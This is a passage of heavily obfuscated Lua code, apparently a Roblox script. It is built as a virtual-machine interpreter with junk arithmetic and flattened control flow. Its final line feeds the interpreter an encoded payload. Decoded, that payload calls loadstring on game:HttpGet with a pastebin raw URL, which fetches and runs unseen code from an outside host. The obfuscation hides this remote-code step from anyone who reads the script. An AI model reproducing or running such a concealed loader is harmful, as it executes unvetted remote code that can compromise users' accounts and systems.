													return 0;
												end)();
												TABLE_TableIndirection["v104%0"] = (function()
													return;
												end)();
												TABLE_TableIndirection["FlatIdent_691EB%0"] = 1;
											end
										end
									end;
								end)();
								TABLE_TableIndirection["v54%0"] = (function()
									return {};
								end)();
								TABLE_TableIndirection["v55%0"] = (function()
									return {};
								end)();
								TABLE_TableIndirection["v56%0"] = (function()
									return {};
								end)();
								TABLE_TableIndirection["v52%0"] = (function()
									return 1 + 0;
								end)();
							end
							break;
						end
					end
				end
				break;
			end
			if (TABLE_TableIndirection["FlatIdent_65290%0"] == 3) then
				TABLE_TableIndirection["v58%0"] = (function()
					return;
				end)();
				TABLE_TableIndirection["v59%0"] = (function()
					return;
				end)();
				TABLE_TableIndirection["FlatIdent_65290%0"] = 4;
			end
			if (TABLE_TableIndirection["FlatIdent_65290%0"] == 1) then
				TABLE_TableIndirection["v54%0"] = (function()
					return;
				end)();
				TABLE_TableIndirection["v55%0"] = (function()
					return;
				end)();
				TABLE_TableIndirection["FlatIdent_65290%0"] = 2;
			end
			if (TABLE_TableIndirection["FlatIdent_65290%0"] == 0) then
				TABLE_TableIndirection["v52%0"] = (function()
					return 0 - 0;
				end)();
				TABLE_TableIndirection["v53%0"] = (function()
					return;
				end)();
				TABLE_TableIndirection["FlatIdent_65290%0"] = 1;
			end
		end
	end
	local function v29(v60, v61, v62)
		TABLE_TableIndirection["v63%0"] = v60[(1643 - (382 + 58)) - (373 + 829)];
		TABLE_TableIndirection["v64%0"] = v60[733 - (476 + (818 - 563))];
		TABLE_TableIndirection["v65%0"] = v60[1260 - (1043 + 178 + 36)];
		return function(...)
			TABLE_TableIndirection["v67%0"] = TABLE_TableIndirection["v63%0"];
			TABLE_TableIndirection["v68%0"] = TABLE_TableIndirection["v64%0"];
			TABLE_TableIndirection["v69%0"] = TABLE_TableIndirection["v65%0"];
			TABLE_TableIndirection["v70%0"] = v27;
			TABLE_TableIndirection["v71%0"] = 3 - 2;
			TABLE_TableIndirection["v72%0"] = -(1213 - (323 + 889));
			TABLE_TableIndirection["v73%0"] = {};
			TABLE_TableIndirection["v74%0"] = {...};
			TABLE_TableIndirection["v75%0"] = TABLE_TableIndirection["v12%0"]("#", ...) - (2 - 1);
			TABLE_TableIndirection["v76%0"] = {};
			TABLE_TableIndirection["v77%0"] = {};
			for v85 = 238 - ((135 - 71) + 174), TABLE_TableIndirection["v75%0"] do
				if (((3051 > 1005) and (v85 >= TABLE_TableIndirection["v69%0"])) or (1075 > 1918)) then
					TABLE_TableIndirection["v73%0"][v85 - TABLE_TableIndirection["v69%0"]] = TABLE_TableIndirection["v74%0"][v85 + (581 - (361 + 219))];
				else
					TABLE_TableIndirection["v77%0"][v85] = TABLE_TableIndirection["v74%0"][v85 + (321 - (53 + 267))];
				end
			end
			TABLE_TableIndirection["v78%0"] = (TABLE_TableIndirection["v75%0"] - TABLE_TableIndirection["v69%0"]) + (337 - (144 + 192));
			TABLE_TableIndirection["v79%0"] = nil;
			TABLE_TableIndirection["v80%0"] = nil;
			while true do
				TABLE_TableIndirection["v79%0"] = TABLE_TableIndirection["v67%0"][TABLE_TableIndirection["v71%0"]];
				TABLE_TableIndirection["v80%0"] = TABLE_TableIndirection["v79%0"][1 + 0];
				if ((396 <= 3804) and (TABLE_TableIndirection["v80%0"] <= ((965 - 546) - (15 + 398)))) then
					if (((3693 <= 4382) and (TABLE_TableIndirection["v80%0"] <= (984 - (8 + 10 + 964)))) or (4169 == 2187)) then
						if ((TABLE_TableIndirection["v80%0"] <= (0 - 0)) or (3282 > 4100)) then
							TABLE_TableIndirection["FlatIdent_521D6%0"] = 0;
							TABLE_TableIndirection["v105%0"] = nil;
							TABLE_TableIndirection["v106%0"] = nil;
							TABLE_TableIndirection["v107%0"] = nil;
							TABLE_TableIndirection["v108%0"] = nil;
							while true do
								if (TABLE_TableIndirection["FlatIdent_521D6%0"] == 1) then
									TABLE_TableIndirection["v72%0"] = (TABLE_TableIndirection["v107%0"] + TABLE_TableIndirection["v105%0"]) - (1 + 0);
									TABLE_TableIndirection["v108%0"] = 850 - (20 + 830);
									TABLE_TableIndirection["FlatIdent_521D6%0"] = 2;
								end
								if (2 == TABLE_TableIndirection["FlatIdent_521D6%0"]) then
									for v114 = TABLE_TableIndirection["v105%0"], TABLE_TableIndirection["v72%0"] do
										TABLE_TableIndirection["v115%0"] = 0 + 0;
										while true do
											if ((TABLE_TableIndirection["v115%0"] == (0 + 0)) or (3580 < 2844)) then
												TABLE_TableIndirection["v108%0"] = TABLE_TableIndirection["v108%0"] + (127 - (116 + 10));
												TABLE_TableIndirection["v77%0"][v114] = TABLE_TableIndirection["v106%0"][TABLE_TableIndirection["v108%0"]];
												break;
											end
										end
									end
									break;
								end
								if (0 == TABLE_TableIndirection["FlatIdent_521D6%0"]) then
									TABLE_TableIndirection["v105%0"] = TABLE_TableIndirection["v79%0"][2 + 0];
									TABLE_TableIndirection["v106%0"], TABLE_TableIndirection["v107%0"] = TABLE_TableIndirection["v70%0"](TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v105%0"]](TABLE_TableIndirection["v13%0"](TABLE_TableIndirection["v77%0"], TABLE_TableIndirection["v105%0"] + 1, TABLE_TableIndirection["v79%0"][(2823 - 1316) - (363 + 1141)])));
									TABLE_TableIndirection["FlatIdent_521D6%0"] = 1;
								end
							end
						elseif ((1406 == 1406) and (TABLE_TableIndirection["v80%0"] > (1976 - (1913 + 62)))) then
							TABLE_TableIndirection["v121%0"] = TABLE_TableIndirection["v79%0"][1 + 1];
							TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v121%0"]] = TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v121%0"]](TABLE_TableIndirection["v13%0"](TABLE_TableIndirection["v77%0"], TABLE_TableIndirection["v121%0"] + (739 - ((1119 - 577) + (525 - 329))), TABLE_TableIndirection["v72%0"]));
						else
							TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v79%0"][5 - 3]] = TABLE_TableIndirection["v79%0"][6 - (8 - 5)];
						end
					elseif (TABLE_TableIndirection["v80%0"] <= (2 + 2)) then
						if ((89 < 4490) and (TABLE_TableIndirection["v80%0"] > (2 + 1))) then
							TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v79%0"][2]] = v62[TABLE_TableIndirection["v79%0"][1936 - (565 + (2595 - (322 + 905)))]];
						else
							TABLE_TableIndirection["v127%0"] = TABLE_TableIndirection["v79%0"][(1212 - (902 + 303)) - 5];
							TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v127%0"]] = TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v127%0"]](TABLE_TableIndirection["v13%0"](TABLE_TableIndirection["v77%0"], TABLE_TableIndirection["v127%0"] + (1 - 0) + 0, TABLE_TableIndirection["v72%0"]));
						end
					elseif ((1531 < 4271) and ((TABLE_TableIndirection["v80%0"] > (6 - (612 - (602 + 9)))) or (4983 < 1808))) then
						TABLE_TableIndirection["v129%0"] = TABLE_TableIndirection["v79%0"][4 - (1191 - (449 + 740))];
						TABLE_TableIndirection["v130%0"] = TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v79%0"][7 - 4]];
						TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v129%0"] + (1552 - ((2711 - 1585) + 425))] = TABLE_TableIndirection["v130%0"];
						TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v129%0"]] = TABLE_TableIndirection["v130%0"][TABLE_TableIndirection["v79%0"][(36 + 373) - (118 + 287)]];
					else
						do
							return;
						end
					end
				elseif (TABLE_TableIndirection["v80%0"] <= (14 - (877 - (826 + 46)))) then
					if ((635 == 635) and (TABLE_TableIndirection["v80%0"] <= (27 - 20))) then
						TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v79%0"][1123 - (118 + 1003)]]();
					elseif ((3373 <= 3556) and (3829 > 3769) and (TABLE_TableIndirection["v80%0"] > (23 - 15))) then
						TABLE_TableIndirection["FlatIdent_21297%0"] = 0;
						TABLE_TableIndirection["v134%0"] = nil;
						TABLE_TableIndirection["v135%0"] = nil;
						TABLE_TableIndirection["v136%0"] = nil;
						TABLE_TableIndirection["v137%0"] = nil;
						TABLE_TableIndirection["v138%0"] = nil;
						while true do
							if (TABLE_TableIndirection["FlatIdent_21297%0"] == 1) then
								TABLE_TableIndirection["v136%0"] = nil;
								TABLE_TableIndirection["v137%0"] = nil;
								TABLE_TableIndirection["FlatIdent_21297%0"] = 2;
							end
							if (TABLE_TableIndirection["FlatIdent_21297%0"] == 2) then
								TABLE_TableIndirection["v138%0"] = nil;
								while true do
									if ((1485 <= 2904) and (TABLE_TableIndirection["v134%0"] == ((1694 - (1121 + 569)) - 3))) then
										TABLE_TableIndirection["v72%0"] = (TABLE_TableIndirection["v137%0"] + TABLE_TableIndirection["v135%0"]) - (1 + 0);
										TABLE_TableIndirection["v138%0"] = 977 - (553 + 424);
										TABLE_TableIndirection["v134%0"] = 3 - 1;
									end
									if (TABLE_TableIndirection["v134%0"] ~= ((6 - 4) + 0)) then
									else
										for v155 = TABLE_TableIndirection["v135%0"], TABLE_TableIndirection["v72%0"] do
											TABLE_TableIndirection["FlatIdent_331F0%0"] = 0;
											while true do
												if (TABLE_TableIndirection["FlatIdent_331F0%0"] == 0) then
													TABLE_TableIndirection["v138%0"] = TABLE_TableIndirection["v138%0"] + 1 + 0;
													TABLE_TableIndirection["v77%0"][v155] = TABLE_TableIndirection["v136%0"][TABLE_TableIndirection["v138%0"]];
													break;
												end
											end
										end
										break;
									end
									if ((TABLE_TableIndirection["v134%0"] == 0) or (3291 < 3280)) then
										TABLE_TableIndirection["v135%0"] = TABLE_TableIndirection["v79%0"][2 + (214 - (22 + 192))];
										TABLE_TableIndirection["v136%0"], TABLE_TableIndirection["v137%0"] = TABLE_TableIndirection["v70%0"](TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v135%0"]](TABLE_TableIndirection["v13%0"](TABLE_TableIndirection["v77%0"], TABLE_TableIndirection["v135%0"] + 1 + 0, TABLE_TableIndirection["v79%0"][(685 - (483 + 200)) + (1464 - (1404 + 59))])));
										TABLE_TableIndirection["v134%0"] = 1 + 0;
									end
								end
								break;
							end
							if (TABLE_TableIndirection["FlatIdent_21297%0"] == 0) then
								TABLE_TableIndirection["v134%0"] = (1324 - (245 + 702)) - (142 + 235);
								TABLE_TableIndirection["v135%0"] = nil;
								TABLE_TableIndirection["FlatIdent_21297%0"] = 1;
							end
						end
					else
						TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v79%0"][4 - 2]] = TABLE_TableIndirection["v79%0"][7 - 4];
					end
				elseif ((4386 >= 873) and (TABLE_TableIndirection["v80%0"] <= ((65 - 41) - (16 - 3)))) then
					if (TABLE_TableIndirection["v80%0"] > 10) then
						TABLE_TableIndirection["FlatIdent_53124%0"] = 0;
						TABLE_TableIndirection["v141%0"] = nil;
						TABLE_TableIndirection["v142%0"] = nil;
						while true do
							if (TABLE_TableIndirection["FlatIdent_53124%0"] == 0) then
								TABLE_TableIndirection["v141%0"] = TABLE_TableIndirection["v79%0"][1 + 1 + 0];
								TABLE_TableIndirection["v142%0"] = TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v79%0"][14 - 11]];
								TABLE_TableIndirection["FlatIdent_53124%0"] = 1;
							end
							if (TABLE_TableIndirection["FlatIdent_53124%0"] == 1) then
								TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v141%0"] + (754 - (239 + 514))] = TABLE_TableIndirection["v142%0"];
								TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v141%0"]] = TABLE_TableIndirection["v142%0"][TABLE_TableIndirection["v79%0"][2 + 2]];
								break;
							end
						end
					else
						do
							return;
						end
					end
				elseif ((921 <= 1102) and (4269 == 4269) and (TABLE_TableIndirection["v80%0"] == (1341 - (797 + 532)))) then
					TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v79%0"][(1900 - (260 + 1638)) + 0]] = v62[TABLE_TableIndirection["v79%0"][2 + 1]];
				else
					TABLE_TableIndirection["v77%0"][TABLE_TableIndirection["v79%0"][4 - 2]]();
				end
				TABLE_TableIndirection["v71%0"] = TABLE_TableIndirection["v71%0"] + (2 - 1);
			end
		end;
	end
	return v29(v28(), {}, v17)(...);
end
return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F725478463446763100083Q00120C3Q00013Q00120C000100023Q00200B000100010003001208000300044Q0009000100034Q00025Q00022Q00073Q000100012Q00053Q00017Q00", TABLE_TableIndirection["v9%0"](), ...);
